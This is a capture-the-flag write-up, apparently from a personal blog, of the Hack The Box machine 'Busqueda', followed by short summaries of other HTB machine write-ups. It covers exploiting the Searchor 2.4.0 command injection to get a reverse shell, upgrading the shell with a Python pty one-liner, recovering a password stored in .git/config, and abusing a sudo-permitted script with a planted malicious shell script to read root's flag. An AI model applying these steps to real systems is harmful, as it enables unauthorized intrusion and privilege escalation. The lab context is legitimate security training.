0xbunnys666

CTF Player,
Hackthebox Player, Blogger

2 minute read

Synopsis

Busqueda is an easy engine from hackthebox. In carrying out the enumeration process from the target, we can identify the version of the application, namely searchor 2.4.0, where in that version there is an Arbitrary Code Execution vulnerability. to get root privileges, we need to be able to get the user from svc in the .git/config directory. the next step is to execute sudo using system-checkup.py with malicious file-checkup.sh

Portscan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Landing page from target

and you will notice the version of application it self.

The version is affected of Arbitrary Code Execution vulnerabillity, you can grab the exploit script in here. Execute command below and start the listener will lead you into system:

./exploit.sh http://searcher.htb/ 10.10.14.146

we logged in as svc user and we can upgrade shell with following command:

python3 -c 'import pty; pty.spawn("/bin/bash")'

you can find the password for svc user in directory .git/config

Privilege Escalation

Run sudo -l will determining how to reach root user in this box

bash-5.1$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

so if you check the directory /opt/scripts, you will notice if there is bash script with name full-checkup.sh.

we can make our malicious full-checkup.sh script too with contains cat /root/root.txt, but before doing that we can user dir /dev/shm to do that.

#!/bin/bash

ping -c 3 10.10.14.146

cat /root/root.txt

execute command below and catch with tcpdump on interface tun0

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

as you can see we able to ping our host and get the root.txt , i thought its gonna be do some export PATH but its not necessary.

Refferencess

https://security.snyk.io/package/pip/searchor/2.4.0
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

You may also enjoy

Socket - Hack The Box

Socket is a medium linux machine featuring qreader executable file. Using the string command will get the pyc file, then we can convert from pyc to python file. Interact using websocket and find sql injection vulnerabilities. To get root privileges, we can use the build-installer script. spec is intended to fulfill the root user.

Pollution - Hack The Box

Pollution is a hardbox from hackthebox. Where in doing penetration testing we can find information in the form of text files and this information is encrypted using base64. the contents of the file contains the token of the administrator. the system has XXE vulnerability, where we can get the /etc/passwd file using Out-of-Band technique. to get access rights to the system we can use php-filter-chain. to get user victor, we can exploit it using php-fpm or fastcgi. The root user can be found by using the vulnerability of the pollution prototype at address 127.0.0.1 using port 3000 or pollutio...

PC - Hack The Box

PC is easy machine from hackthebox. in the initial foothold we can interact on port 50051 which is gRPC. we can use grpcui to get a good interface. then followed by registering the user using the login method. after logging in using the credentials we created, we can use get-info by filling in our id and token. capture the request and name the file pc.req. drop it into sqlmap so it does the rest. to get root privileges, there is a cve on the pyload. The content-length header has a big impact on the application pyload.

Only4You - Hack The Box

only for you on a medium linux machine that resembles a ctf which can be said to have no real life vulnerabilities. in enumeration process we can get beta as sub domain and get source code. do our analysis determine LFI vulnerabilities in this domain. take the app.py file on the domain only4you.htb will get the RCE vulnerability, where attackers can send requests using the POST method and email, subject, messages as parameters. After getting shell access, we see an application running on localhost using port 3000 and 8001. Doing port forwarding will find neo4j on port 8001, we can get a val...